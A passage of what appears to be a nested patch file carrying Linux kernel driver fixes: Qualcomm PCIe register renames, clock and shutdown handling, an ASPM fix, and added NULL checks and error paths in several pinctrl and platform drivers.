++	val = readl(pcie->parf + PARF_SYS_CTRL);
+ 	val &= ~BIT(29);
+-	writel(val, pcie->parf + PCIE20_PARF_SYS_CTRL);
++	writel(val, pcie->parf + PARF_SYS_CTRL);
+ 
+-	val = readl(pcie->parf + PCIE20_PARF_MHI_CLOCK_RESET_CTRL);
++	val = readl(pcie->parf + PARF_MHI_CLOCK_RESET_CTRL);
+ 	val |= BIT(4);
+-	writel(val, pcie->parf + PCIE20_PARF_MHI_CLOCK_RESET_CTRL);
++	writel(val, pcie->parf + PARF_MHI_CLOCK_RESET_CTRL);
+ 
+-	val = readl(pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2);
++	val = readl(pcie->parf + PARF_AXI_MSTR_WR_ADDR_HALT_V2);
+ 	val |= BIT(31);
+-	writel(val, pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2);
++	writel(val, pcie->parf + PARF_AXI_MSTR_WR_ADDR_HALT_V2);
+ 
+ 	return 0;
+ }
+@@ -974,25 +986,25 @@ static int qcom_pcie_post_init_2_4_0(struct qcom_pcie *pcie)
+ 	u32 val;
+ 
+ 	/* enable PCIe clocks and resets */
+-	val = readl(pcie->parf + PCIE20_PARF_PHY_CTRL);
++	val = readl(pcie->parf + PARF_PHY_CTRL);
+ 	val &= ~BIT(0);
+-	writel(val, pcie->parf + PCIE20_PARF_PHY_CTRL);
++	writel(val, pcie->parf + PARF_PHY_CTRL);
+ 
+ 	/* change DBI base address */
+-	writel(0, pcie->parf + PCIE20_PARF_DBI_BASE_ADDR);
++	writel(0, pcie->parf + PARF_DBI_BASE_ADDR);
+ 
+ 	/* MAC PHY_POWERDOWN MUX DISABLE  */
+-	val = readl(pcie->parf + PCIE20_PARF_SYS_CTRL);
++	val = readl(pcie->parf + PARF_SYS_CTRL);
+ 	val &= ~BIT(29);
+-	writel(val, pcie->parf + PCIE20_PARF_SYS_CTRL);
++	writel(val, pcie->parf + PARF_SYS_CTRL);
+ 
+-	val = readl(pcie->parf + PCIE20_PARF_MHI_CLOCK_RESET_CTRL);
++	val = readl(pcie->parf + PARF_MHI_CLOCK_RESET_CTRL);
+ 	val |= BIT(4);
+-	writel(val, pcie->parf + PCIE20_PARF_MHI_CLOCK_RESET_CTRL);
++	writel(val, pcie->parf + PARF_MHI_CLOCK_RESET_CTRL);
+ 
+-	val = readl(pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2);
++	val = readl(pcie->parf + PARF_AXI_MSTR_WR_ADDR_HALT_V2);
+ 	val |= BIT(31);
+-	writel(val, pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2);
++	writel(val, pcie->parf + PARF_AXI_MSTR_WR_ADDR_HALT_V2);
+ 
+ 	return 0;
+ }
+@@ -1137,22 +1149,24 @@ static int qcom_pcie_post_init_2_3_3(struct qcom_pcie *pcie)
+ 	u32 val;
+ 
+ 	writel(SLV_ADDR_SPACE_SZ,
+-		pcie->parf + PCIE20_v3_PARF_SLV_ADDR_SPACE_SIZE);
++		pcie->parf + PARF_SLV_ADDR_SPACE_SIZE_2_3_3);
+ 
+-	val = readl(pcie->parf + PCIE20_PARF_PHY_CTRL);
++	val = readl(pcie->parf + PARF_PHY_CTRL);
+ 	val &= ~BIT(0);
+-	writel(val, pcie->parf + PCIE20_PARF_PHY_CTRL);
++	writel(val, pcie->parf + PARF_PHY_CTRL);
+ 
+-	writel(0, pcie->parf + PCIE20_PARF_DBI_BASE_ADDR);
++	writel(0, pcie->parf + PARF_DBI_BASE_ADDR);
+ 
+ 	writel(MST_WAKEUP_EN | SLV_WAKEUP_EN | MSTR_ACLK_CGC_DIS
+ 		| SLV_ACLK_CGC_DIS | CORE_CLK_CGC_DIS |
+ 		AUX_PWR_DET | L23_CLK_RMV_DIS | L1_CLK_RMV_DIS,
+-		pcie->parf + PCIE20_PARF_SYS_CTRL);
+-	writel(0, pcie->parf + PCIE20_PARF_Q2A_FLUSH);
++		pcie->parf + PARF_SYS_CTRL);
++	writel(0, pcie->parf + PARF_Q2A_FLUSH);
+ 
+ 	writel(PCI_COMMAND_MASTER, pci->dbi_base + PCI_COMMAND);
+-	writel(DBI_RO_WR_EN, pci->dbi_base + PCIE20_MISC_CONTROL_1_REG);
++
++	dw_pcie_dbi_ro_wr_en(pci);
++
+ 	writel(PCIE_CAP_SLOT_VAL, pci->dbi_base + offset + PCI_EXP_SLTCAP);
+ 
+ 	val = readl(pci->dbi_base + offset + PCI_EXP_LNKCAP);
+@@ -1252,33 +1266,33 @@ static int qcom_pcie_init_2_7_0(struct qcom_pcie *pcie)
+ 	usleep_range(1000, 1500);
+ 
+ 	/* configure PCIe to RC mode */
+-	writel(DEVICE_TYPE_RC, pcie->parf + PCIE20_PARF_DEVICE_TYPE);
++	writel(DEVICE_TYPE_RC, pcie->parf + PARF_DEVICE_TYPE);
+ 
+ 	/* enable PCIe clocks and resets */
+-	val = readl(pcie->parf + PCIE20_PARF_PHY_CTRL);
++	val = readl(pcie->parf + PARF_PHY_CTRL);
+ 	val &= ~BIT(0);
+-	writel(val, pcie->parf + PCIE20_PARF_PHY_CTRL);
++	writel(val, pcie->parf + PARF_PHY_CTRL);
+ 
+ 	/* change DBI base address */
+-	writel(0, pcie->parf + PCIE20_PARF_DBI_BASE_ADDR);
++	writel(0, pcie->parf + PARF_DBI_BASE_ADDR);
+ 
+ 	/* MAC PHY_POWERDOWN MUX DISABLE  */
+-	val = readl(pcie->parf + PCIE20_PARF_SYS_CTRL);
++	val = readl(pcie->parf + PARF_SYS_CTRL);
+ 	val &= ~BIT(29);
+-	writel(val, pcie->parf + PCIE20_PARF_SYS_CTRL);
++	writel(val, pcie->parf + PARF_SYS_CTRL);
+ 
+-	val = readl(pcie->parf + PCIE20_PARF_MHI_CLOCK_RESET_CTRL);
++	val = readl(pcie->parf + PARF_MHI_CLOCK_RESET_CTRL);
+ 	val |= BIT(4);
+-	writel(val, pcie->parf + PCIE20_PARF_MHI_CLOCK_RESET_CTRL);
++	writel(val, pcie->parf + PARF_MHI_CLOCK_RESET_CTRL);
+ 
+ 	/* Enable L1 and L1SS */
+-	val = readl(pcie->parf + PCIE20_PARF_PM_CTRL);
++	val = readl(pcie->parf + PARF_PM_CTRL);
+ 	val &= ~REQ_NOT_ENTR_L1;
+-	writel(val, pcie->parf + PCIE20_PARF_PM_CTRL);
++	writel(val, pcie->parf + PARF_PM_CTRL);
+ 
+-	val = readl(pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2);
++	val = readl(pcie->parf + PARF_AXI_MSTR_WR_ADDR_HALT_V2);
+ 	val |= BIT(31);
+-	writel(val, pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2);
++	writel(val, pcie->parf + PARF_AXI_MSTR_WR_ADDR_HALT_V2);
+ 
+ 	return 0;
+ err_disable_clocks:
+@@ -1366,17 +1380,17 @@ static int qcom_pcie_post_init_2_9_0(struct qcom_pcie *pcie)
+ 	int i;
+ 
+ 	writel(SLV_ADDR_SPACE_SZ,
+-		pcie->parf + PCIE20_v3_PARF_SLV_ADDR_SPACE_SIZE);
++		pcie->parf + PARF_SLV_ADDR_SPACE_SIZE);
+ 
+-	val = readl(pcie->parf + PCIE20_PARF_PHY_CTRL);
++	val = readl(pcie->parf + PARF_PHY_CTRL);
+ 	val &= ~BIT(0);
+-	writel(val, pcie->parf + PCIE20_PARF_PHY_CTRL);
++	writel(val, pcie->parf + PARF_PHY_CTRL);
+ 
+-	writel(0, pcie->parf + PCIE20_PARF_DBI_BASE_ADDR);
++	writel(0, pcie->parf + PARF_DBI_BASE_ADDR);
+ 
+-	writel(DEVICE_TYPE_RC, pcie->parf + PCIE20_PARF_DEVICE_TYPE);
++	writel(DEVICE_TYPE_RC, pcie->parf + PARF_DEVICE_TYPE);
+ 	writel(BYPASS | MSTR_AXI_CLK_EN | AHB_CLK_EN,
+-		pcie->parf + PCIE20_PARF_MHI_CLOCK_RESET_CTRL);
++		pcie->parf + PARF_MHI_CLOCK_RESET_CTRL);
+ 	writel(GEN3_RELATED_OFF_RXEQ_RGRDLESS_RXTS |
+ 		GEN3_RELATED_OFF_GEN3_ZRXDC_NONCOMPL,
+ 		pci->dbi_base + GEN3_RELATED_OFF);
+@@ -1384,11 +1398,12 @@ static int qcom_pcie_post_init_2_9_0(struct qcom_pcie *pcie)
+ 	writel(MST_WAKEUP_EN | SLV_WAKEUP_EN | MSTR_ACLK_CGC_DIS |
+ 		SLV_ACLK_CGC_DIS | CORE_CLK_CGC_DIS |
+ 		AUX_PWR_DET | L23_CLK_RMV_DIS | L1_CLK_RMV_DIS,
+-		pcie->parf + PCIE20_PARF_SYS_CTRL);
++		pcie->parf + PARF_SYS_CTRL);
+ 
+-	writel(0, pcie->parf + PCIE20_PARF_Q2A_FLUSH);
++	writel(0, pcie->parf + PARF_Q2A_FLUSH);
+ 
+ 	dw_pcie_dbi_ro_wr_en(pci);
++
+ 	writel(PCIE_CAP_SLOT_VAL, pci->dbi_base + offset + PCI_EXP_SLTCAP);
+ 
+ 	val = readl(pci->dbi_base + offset + PCI_EXP_LNKCAP);
+@@ -1398,8 +1413,10 @@ static int qcom_pcie_post_init_2_9_0(struct qcom_pcie *pcie)
+ 	writel(PCI_EXP_DEVCTL2_COMP_TMOUT_DIS, pci->dbi_base + offset +
+ 			PCI_EXP_DEVCTL2);
+ 
++	dw_pcie_dbi_ro_wr_dis(pci);
++
+ 	for (i = 0; i < 256; i++)
+-		writel(0, pcie->parf + PCIE20_PARF_BDF_TO_SID_TABLE_N + (4 * i));
++		writel(0, pcie->parf + PARF_BDF_TO_SID_TABLE_N + (4 * i));
+ 
+ 	return 0;
+ }
+@@ -1421,7 +1438,7 @@ static int qcom_pcie_config_sid_sm8250(struct qcom_pcie *pcie)
+ 		u32 smmu_sid;
+ 		u32 smmu_sid_len;
+ 	} *map;
+-	void __iomem *bdf_to_sid_base = pcie->parf + PCIE20_PARF_BDF_TO_SID_TABLE_N;
++	void __iomem *bdf_to_sid_base = pcie->parf + PARF_BDF_TO_SID_TABLE_N;
+ 	struct device *dev = pcie->pci->dev;
+ 	u8 qcom_pcie_crc8_table[CRC8_TABLE_SIZE];
+ 	int i, nr_map, size = 0;
+diff --git a/drivers/pci/controller/pci-ftpci100.c b/drivers/pci/controller/pci-ftpci100.c
+index 0cfd9d5a497c9..f7e61e169d838 100644
+--- a/drivers/pci/controller/pci-ftpci100.c
++++ b/drivers/pci/controller/pci-ftpci100.c
+@@ -429,22 +429,12 @@ static int faraday_pci_probe(struct platform_device *pdev)
+ 	p->dev = dev;
+ 
+ 	/* Retrieve and enable optional clocks */
+-	clk = devm_clk_get(dev, "PCLK");
++	clk = devm_clk_get_enabled(dev, "PCLK");
+ 	if (IS_ERR(clk))
+ 		return PTR_ERR(clk);
+-	ret = clk_prepare_enable(clk);
+-	if (ret) {
+-		dev_err(dev, "could not prepare PCLK\n");
+-		return ret;
+-	}
+-	p->bus_clk = devm_clk_get(dev, "PCICLK");
++	p->bus_clk = devm_clk_get_enabled(dev, "PCICLK");
+ 	if (IS_ERR(p->bus_clk))
+ 		return PTR_ERR(p->bus_clk);
+-	ret = clk_prepare_enable(p->bus_clk);
+-	if (ret) {
+-		dev_err(dev, "could not prepare PCICLK\n");
+-		return ret;
+-	}
+ 
+ 	p->base = devm_platform_ioremap_resource(pdev, 0);
+ 	if (IS_ERR(p->base))
+diff --git a/drivers/pci/controller/vmd.c b/drivers/pci/controller/vmd.c
+index 769eedeb8802a..d1eb17e3f1474 100644
+--- a/drivers/pci/controller/vmd.c
++++ b/drivers/pci/controller/vmd.c
+@@ -872,7 +872,8 @@ static int vmd_enable_domain(struct vmd_dev *vmd, unsigned long features)
+ 		if (!list_empty(&child->devices)) {
+ 			dev = list_first_entry(&child->devices,
+ 					       struct pci_dev, bus_list);
+-			if (pci_reset_bus(dev))
++			ret = pci_reset_bus(dev);
++			if (ret)
+ 				pci_warn(dev, "can't reset device: %d\n", ret);
+ 
+ 			break;
+@@ -979,6 +980,13 @@ static void vmd_remove(struct pci_dev *dev)
+ 	ida_simple_remove(&vmd_instance_ida, vmd->instance);
+ }
+ 
++static void vmd_shutdown(struct pci_dev *dev)
++{
++        struct vmd_dev *vmd = pci_get_drvdata(dev);
++
++        vmd_remove_irq_domain(vmd);
++}
++
+ #ifdef CONFIG_PM_SLEEP
+ static int vmd_suspend(struct device *dev)
+ {
+@@ -1056,6 +1064,7 @@ static struct pci_driver vmd_drv = {
+ 	.id_table	= vmd_ids,
+ 	.probe		= vmd_probe,
+ 	.remove		= vmd_remove,
++	.shutdown	= vmd_shutdown,
+ 	.driver		= {
+ 		.pm	= &vmd_dev_pm_ops,
+ 	},
+diff --git a/drivers/pci/endpoint/functions/Kconfig b/drivers/pci/endpoint/functions/Kconfig
+index 295a033ee9a27..8efb6a869e7ce 100644
+--- a/drivers/pci/endpoint/functions/Kconfig
++++ b/drivers/pci/endpoint/functions/Kconfig
+@@ -27,13 +27,13 @@ config PCI_EPF_NTB
+ 	  If in doubt, say "N" to disable Endpoint NTB driver.
+ 
+ config PCI_EPF_VNTB
+-        tristate "PCI Endpoint NTB driver"
+-        depends on PCI_ENDPOINT
+-        depends on NTB
+-        select CONFIGFS_FS
+-        help
+-          Select this configuration option to enable the Non-Transparent
+-          Bridge (NTB) driver for PCIe Endpoint. NTB driver implements NTB
+-          between PCI Root Port and PCIe Endpoint.
++	tristate "PCI Endpoint Virtual NTB driver"
++	depends on PCI_ENDPOINT
++	depends on NTB
++	select CONFIGFS_FS
++	help
++	  Select this configuration option to enable the Non-Transparent
++	  Bridge (NTB) driver for PCIe Endpoint. NTB driver implements NTB
++	  between PCI Root Port and PCIe Endpoint.
+ 
+-          If in doubt, say "N" to disable Endpoint NTB driver.
++	  If in doubt, say "N" to disable Endpoint NTB driver.
+diff --git a/drivers/pci/endpoint/functions/pci-epf-test.c b/drivers/pci/endpoint/functions/pci-epf-test.c
+index 55283d2379a6a..f0c4d0f77453a 100644
+--- a/drivers/pci/endpoint/functions/pci-epf-test.c
++++ b/drivers/pci/endpoint/functions/pci-epf-test.c
+@@ -112,7 +112,7 @@ static int pci_epf_test_data_transfer(struct pci_epf_test *epf_test,
+ 				      size_t len, dma_addr_t dma_remote,
+ 				      enum dma_transfer_direction dir)
+ {
+-	struct dma_chan *chan = (dir == DMA_DEV_TO_MEM) ?
++	struct dma_chan *chan = (dir == DMA_MEM_TO_DEV) ?
+ 				 epf_test->dma_chan_tx : epf_test->dma_chan_rx;
+ 	dma_addr_t dma_local = (dir == DMA_MEM_TO_DEV) ? dma_src : dma_dst;
+ 	enum dma_ctrl_flags flags = DMA_CTRL_ACK | DMA_PREP_INTERRUPT;
+diff --git a/drivers/pci/hotplug/pciehp_ctrl.c b/drivers/pci/hotplug/pciehp_ctrl.c
+index 529c348084401..32baba1b7f131 100644
+--- a/drivers/pci/hotplug/pciehp_ctrl.c
++++ b/drivers/pci/hotplug/pciehp_ctrl.c
+@@ -256,6 +256,14 @@ void pciehp_handle_presence_or_link_change(struct controller *ctrl, u32 events)
+ 	present = pciehp_card_present(ctrl);
+ 	link_active = pciehp_check_link_active(ctrl);
+ 	if (present <= 0 && link_active <= 0) {
++		if (ctrl->state == BLINKINGON_STATE) {
++			ctrl->state = OFF_STATE;
++			cancel_delayed_work(&ctrl->button_work);
++			pciehp_set_indicators(ctrl, PCI_EXP_SLTCTL_PWR_IND_OFF,
++					      INDICATOR_NOOP);
++			ctrl_info(ctrl, "Slot(%s): Card not present\n",
++				  slot_name(ctrl));
++		}
+ 		mutex_unlock(&ctrl->state_lock);
+ 		return;
+ 	}
+diff --git a/drivers/pci/pcie/aspm.c b/drivers/pci/pcie/aspm.c
+index 4b4184563a927..74b8183c305df 100644
+--- a/drivers/pci/pcie/aspm.c
++++ b/drivers/pci/pcie/aspm.c
+@@ -1010,21 +1010,24 @@ void pcie_aspm_exit_link_state(struct pci_dev *pdev)
+ 
+ 	down_read(&pci_bus_sem);
+ 	mutex_lock(&aspm_lock);
+-	/*
+-	 * All PCIe functions are in one slot, remove one function will remove
+-	 * the whole slot, so just wait until we are the last function left.
+-	 */
+-	if (!list_empty(&parent->subordinate->devices))
+-		goto out;
+ 
+ 	link = parent->link_state;
+ 	root = link->root;
+ 	parent_link = link->parent;
+ 
+-	/* All functions are removed, so just disable ASPM for the link */
++	/*
++	 * link->downstream is a pointer to the pci_dev of function 0.  If
++	 * we remove that function, the pci_dev is about to be deallocated,
++	 * so we can't use link->downstream again.  Free the link state to
++	 * avoid this.
++	 *
++	 * If we're removing a non-0 function, it's possible we could
++	 * retain the link state, but PCIe r6.0, sec 7.5.3.7, recommends
++	 * programming the same ASPM Control value for all functions of
++	 * multi-function devices, so disable ASPM for all of them.
++	 */
+ 	pcie_config_aspm_link(link, 0);
+ 	list_del(&link->sibling);
+-	/* Clock PM is for endpoint device */
+ 	free_link_state(link);
+ 
+ 	/* Recheck latencies and configure upstream links */
+@@ -1032,7 +1035,7 @@ void pcie_aspm_exit_link_state(struct pci_dev *pdev)
+ 		pcie_update_aspm_capable(root);
+ 		pcie_config_aspm_path(parent_link);
+ 	}
+-out:
++
+ 	mutex_unlock(&aspm_lock);
+ 	up_read(&pci_bus_sem);
+ }
+diff --git a/drivers/perf/arm-cmn.c b/drivers/perf/arm-cmn.c
+index ff86075edca48..90008e24d1cc7 100644
+--- a/drivers/perf/arm-cmn.c
++++ b/drivers/perf/arm-cmn.c
+@@ -1898,9 +1898,10 @@ static int arm_cmn_init_dtc(struct arm_cmn *cmn, struct arm_cmn_node *dn, int id
+ 	if (dtc->irq < 0)
+ 		return dtc->irq;
+ 
+-	writel_relaxed(0, dtc->base + CMN_DT_PMCR);
++	writel_relaxed(CMN_DT_DTC_CTL_DT_EN, dtc->base + CMN_DT_DTC_CTL);
++	writel_relaxed(CMN_DT_PMCR_PMU_EN | CMN_DT_PMCR_OVFL_INTR_EN, dtc->base + CMN_DT_PMCR);
++	writeq_relaxed(0, dtc->base + CMN_DT_PMCCNTR);
+ 	writel_relaxed(0x1ff, dtc->base + CMN_DT_PMOVSR_CLR);
+-	writel_relaxed(CMN_DT_PMCR_OVFL_INTR_EN, dtc->base + CMN_DT_PMCR);
+ 
+ 	return 0;
+ }
+@@ -1960,7 +1961,7 @@ static int arm_cmn_init_dtcs(struct arm_cmn *cmn)
+ 			dn->type = CMN_TYPE_CCLA;
+ 	}
+ 
+-	writel_relaxed(CMN_DT_DTC_CTL_DT_EN, cmn->dtc[0].base + CMN_DT_DTC_CTL);
++	arm_cmn_set_state(cmn, CMN_STATE_DISABLED);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/perf/hisilicon/hisi_pcie_pmu.c b/drivers/perf/hisilicon/hisi_pcie_pmu.c
+index 071e63d9a9ac6..b61f1f9aba214 100644
+--- a/drivers/perf/hisilicon/hisi_pcie_pmu.c
++++ b/drivers/perf/hisilicon/hisi_pcie_pmu.c
+@@ -672,7 +672,7 @@ static int hisi_pcie_pmu_offline_cpu(unsigned int cpu, struct hlist_node *node)
+ 
+ 	pcie_pmu->on_cpu = -1;
+ 	/* Choose a new CPU from all online cpus. */
+-	target = cpumask_first(cpu_online_mask);
++	target = cpumask_any_but(cpu_online_mask, cpu);
+ 	if (target >= nr_cpu_ids) {
+ 		pci_err(pcie_pmu->pdev, "There is no CPU to set\n");
+ 		return 0;
+diff --git a/drivers/phy/tegra/xusb.c b/drivers/phy/tegra/xusb.c
+index ce14645a86ecb..4d5b4071d47d5 100644
+--- a/drivers/phy/tegra/xusb.c
++++ b/drivers/phy/tegra/xusb.c
+@@ -562,6 +562,7 @@ static void tegra_xusb_port_unregister(struct tegra_xusb_port *port)
+ 		usb_role_switch_unregister(port->usb_role_sw);
+ 		cancel_work_sync(&port->usb_phy_work);
+ 		usb_remove_phy(&port->usb_phy);
++		port->usb_phy.dev->driver = NULL;
+ 	}
+ 
+ 	if (port->ops->remove)
+@@ -669,6 +670,9 @@ static int tegra_xusb_setup_usb_role_switch(struct tegra_xusb_port *port)
+ 	port->dev.driver = devm_kzalloc(&port->dev,
+ 					sizeof(struct device_driver),
+ 					GFP_KERNEL);
++	if (!port->dev.driver)
++		return -ENOMEM;
++
+ 	port->dev.driver->owner	 = THIS_MODULE;
+ 
+ 	port->usb_role_sw = usb_role_switch_register(&port->dev,
+diff --git a/drivers/pinctrl/bcm/pinctrl-bcm2835.c b/drivers/pinctrl/bcm/pinctrl-bcm2835.c
+index 0f1ab0829ffe6..fe8da3ccb0b5a 100644
+--- a/drivers/pinctrl/bcm/pinctrl-bcm2835.c
++++ b/drivers/pinctrl/bcm/pinctrl-bcm2835.c
+@@ -376,10 +376,8 @@ static int bcm2835_of_gpio_ranges_fallback(struct gpio_chip *gc,
+ 	if (!pctldev)
+ 		return 0;
+ 
+-	gpiochip_add_pin_range(gc, pinctrl_dev_get_devname(pctldev), 0, 0,
+-			       gc->ngpio);
+-
+-	return 0;
++	return gpiochip_add_pin_range(gc, pinctrl_dev_get_devname(pctldev), 0, 0,
++				      gc->ngpio);
+ }
+ 
+ static const struct gpio_chip bcm2835_gpio_chip = {
+diff --git a/drivers/pinctrl/intel/pinctrl-cherryview.c b/drivers/pinctrl/intel/pinctrl-cherryview.c
+index 5c4fd16e5b010..0d6b5fab2f7e4 100644
+--- a/drivers/pinctrl/intel/pinctrl-cherryview.c
++++ b/drivers/pinctrl/intel/pinctrl-cherryview.c
+@@ -947,11 +947,6 @@ static int chv_config_get(struct pinctrl_dev *pctldev, unsigned int pin,
+ 
+ 		break;
+ 
+-	case PIN_CONFIG_DRIVE_OPEN_DRAIN:
+-		if (!(ctrl1 & CHV_PADCTRL1_ODEN))
+-			return -EINVAL;
+-		break;
+-
+ 	case PIN_CONFIG_BIAS_HIGH_IMPEDANCE: {
+ 		u32 cfg;
+ 
+@@ -961,6 +956,16 @@ static int chv_config_get(struct pinctrl_dev *pctldev, unsigned int pin,
+ 			return -EINVAL;
+ 
+ 		break;
++
++	case PIN_CONFIG_DRIVE_PUSH_PULL:
++		if (ctrl1 & CHV_PADCTRL1_ODEN)
++			return -EINVAL;
++		break;
++
++	case PIN_CONFIG_DRIVE_OPEN_DRAIN:
++		if (!(ctrl1 & CHV_PADCTRL1_ODEN))
++			return -EINVAL;
++		break;
+ 	}
+ 
+ 	default:
+diff --git a/drivers/pinctrl/nuvoton/pinctrl-npcm7xx.c b/drivers/pinctrl/nuvoton/pinctrl-npcm7xx.c
+index 1c4e89b046de1..ac4c69132fa03 100644
+--- a/drivers/pinctrl/nuvoton/pinctrl-npcm7xx.c
++++ b/drivers/pinctrl/nuvoton/pinctrl-npcm7xx.c
+@@ -1878,6 +1878,8 @@ static int npcm7xx_gpio_of(struct npcm7xx_pinctrl *pctrl)
+ 		}
+ 
+ 		pctrl->gpio_bank[id].base = ioremap(res.start, resource_size(&res));
++		if (!pctrl->gpio_bank[id].base)
++			return -EINVAL;
+ 
+ 		ret = bgpio_init(&pctrl->gpio_bank[id].gc, dev, 4,
+ 				 pctrl->gpio_bank[id].base + NPCM7XX_GP_N_DIN,
+diff --git a/drivers/pinctrl/pinctrl-at91-pio4.c b/drivers/pinctrl/pinctrl-at91-pio4.c
+index 0b7cc6f063e00..f71c6457e3509 100644
+--- a/drivers/pinctrl/pinctrl-at91-pio4.c
++++ b/drivers/pinctrl/pinctrl-at91-pio4.c
+@@ -1122,6 +1122,8 @@ static int atmel_pinctrl_probe(struct platform_device *pdev)
+ 		/* Pin naming convention: P(bank_name)(bank_pin_number). */
+ 		pin_desc[i].name = devm_kasprintf(&pdev->dev, GFP_KERNEL, "P%c%d",
+ 						  bank + 'A', line);
++		if (!pin_desc[i].name)
++			return -ENOMEM;
+ 
+ 		group->name = group_names[i] = pin_desc[i].name;
+ 		group->pin = pin_desc[i].number;
+diff --git a/drivers/pinctrl/pinctrl-microchip-sgpio.c b/drivers/pinctrl/pinctrl-microchip-sgpio.c
+index af27b72c89586..96a20ce94f5e9 100644
+--- a/drivers/pinctrl/pinctrl-microchip-sgpio.c
++++ b/drivers/pinctrl/pinctrl-microchip-sgpio.c
+@@ -816,6 +816,9 @@ static int microchip_sgpio_register_bank(struct device *dev,
+ 	pctl_desc->name = devm_kasprintf(dev, GFP_KERNEL, "%s-%sput",
+ 					 dev_name(dev),
+ 					 bank->is_input ? "in" : "out");
++	if (!pctl_desc->name)
++		return -ENOMEM;
++
+ 	pctl_desc->pctlops = &sgpio_pctl_ops;
+ 	pctl_desc->pmxops = &sgpio_pmx_ops;
+ 	pctl_desc->confops = &sgpio_confops;
+diff --git a/drivers/pinctrl/sunplus/sppctl.c b/drivers/pinctrl/sunplus/sppctl.c
+index 2b3335ab56c66..6b24fa0e63c0f 100644
+--- a/drivers/pinctrl/sunplus/sppctl.c
++++ b/drivers/pinctrl/sunplus/sppctl.c
+@@ -838,11 +838,6 @@ static int sppctl_dt_node_to_map(struct pinctrl_dev *pctldev, struct device_node
+ 	int i, size = 0;
+ 
+ 	list = of_get_property(np_config, "sunplus,pins", &size);
+-
+-	if (nmG <= 0)
+-		nmG = 0;
+-
+-	parent = of_get_parent(np_config);
+ 	*num_maps = size / sizeof(*list);
+ 
+ 	/*
+@@ -870,10 +865,14 @@ static int sppctl_dt_node_to_map(struct pinctrl_dev *pctldev, struct device_node
+ 		}
+ 	}
+ 
++	if (nmG <= 0)
++		nmG = 0;
++
+ 	*map = kcalloc(*num_maps + nmG, sizeof(**map), GFP_KERNEL);
+-	if (*map == NULL)
++	if (!(*map))
+ 		return -ENOMEM;
+ 
++	parent = of_get_parent(np_config);
+ 	for (i = 0; i < (*num_maps); i++) {
+ 		dt_pin = be32_to_cpu(list[i]);
+ 		pin_num = FIELD_GET(GENMASK(31, 24), dt_pin);
+@@ -887,6 +886,8 @@ static int sppctl_dt_node_to_map(struct pinctrl_dev *pctldev, struct device_node
+ 			(*map)[i].data.configs.num_configs = 1;
+ 			(*map)[i].data.configs.group_or_pin = pin_get_name(pctldev, pin_num);
+ 			configs = kmalloc(sizeof(*configs), GFP_KERNEL);
++			if (!configs)
++				goto sppctl_map_err;
+ 			*configs = FIELD_GET(GENMASK(7, 0), dt_pin);
+ 			(*map)[i].data.configs.configs = configs;
+ 
+@@ -900,6 +901,8 @@ static int sppctl_dt_node_to_map(struct pinctrl_dev *pctldev, struct device_node
+ 			(*map)[i].data.configs.num_configs = 1;
+ 			(*map)[i].data.configs.group_or_pin = pin_get_name(pctldev, pin_num);
+ 			configs = kmalloc(sizeof(*configs), GFP_KERNEL);
++			if (!configs)
++				goto sppctl_map_err;
+ 			*configs = SPPCTL_IOP_CONFIGS;
+ 			(*map)[i].data.configs.configs = configs;
+ 
+@@ -969,6 +972,14 @@ static int sppctl_dt_node_to_map(struct pinctrl_dev *pctldev, struct device_node
+ 	of_node_put(parent);
+ 	dev_dbg(pctldev->dev, "%d pins mapped\n", *num_maps);
+ 	return 0;
++
++sppctl_map_err:
++	for (i = 0; i < (*num_maps); i++)
++		if ((*map)[i].type == PIN_MAP_TYPE_CONFIGS_PIN)
++			kfree((*map)[i].data.configs.configs);
++	kfree(*map);
++	of_node_put(parent);
++	return -ENOMEM;
+ }
+ 
+ static const struct pinctrl_ops sppctl_pctl_ops = {
+diff --git a/drivers/platform/x86/dell/dell-rbtn.c b/drivers/platform/x86/dell/dell-rbtn.c
+index a89fad47ff139..d3b1cb73de97a 100644
+--- a/drivers/platform/x86/dell/dell-rbtn.c
++++ b/drivers/platform/x86/dell/dell-rbtn.c
+@@ -395,16 +395,16 @@ static int rbtn_add(struct acpi_device *device)
+ 		return -EINVAL;
+ 	}
+ 
++	rbtn_data = devm_kzalloc(&device->dev, sizeof(*rbtn_data), GFP_KERNEL);
++	if (!rbtn_data)
++		return -ENOMEM;
++
+ 	ret = rbtn_acquire(device, true);
+ 	if (ret < 0) {
+ 		dev_err(&device->dev, "Cannot enable device\n");
+ 		return ret;
+ 	}
+ 
+-	rbtn_data = devm_kzalloc(&device->dev, sizeof(*rbtn_data), GFP_KERNEL);
+-	if (!rbtn_data)
+-		return -ENOMEM;
+-
+ 	rbtn_data->type = type;
+ 	device->driver_data = rbtn_data;
+ 
+@@ -420,10 +420,12 @@ static int rbtn_add(struct acpi_device *device)
+ 		break;
+ 	default:
+ 		ret = -EINVAL;
++		break;
+ 	}
++	if (ret)
++		rbtn_acquire(device, false);
+ 
+ 	return ret;
+-
+ }
+ 
+ static int rbtn_remove(struct acpi_device *device)
+@@ -442,7 +444,6 @@ static int rbtn_remove(struct acpi_device *device)
+ 	}
+ 
+ 	rbtn_acquire(device, false);
+-	device->driver_data = NULL;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/platform/x86/lenovo-yogabook-wmi.c b/drivers/platform/x86/lenovo-yogabook-wmi.c
+index 5f4bd1eec38a9..d57fcc8388519 100644
+--- a/drivers/platform/x86/lenovo-yogabook-wmi.c
++++ b/drivers/platform/x86/lenovo-yogabook-wmi.c
+@@ -2,7 +2,6 @@
+ /* WMI driver for Lenovo Yoga Book YB1-X90* / -X91* tablets */
+ 
+ #include <linux/acpi.h>
+-#include <linux/devm-helpers.h>
+ #include <linux/gpio/consumer.h>
+ #include <linux/gpio/machine.h>
+ #include <linux/interrupt.h>
+@@ -248,10 +247,7 @@ static int yogabook_wmi_probe(struct wmi_device *wdev, const void *context)
+ 	data->brightness = YB_KBD_BL_DEFAULT;
+ 	set_bit(YB_KBD_IS_ON, &data->flags);
+ 	set_bit(YB_DIGITIZER_IS_ON, &data->flags);
+-
+-	r = devm_work_autocancel(&wdev->dev, &data->work, yogabook_wmi_work);
+-	if (r)
+-		return r;
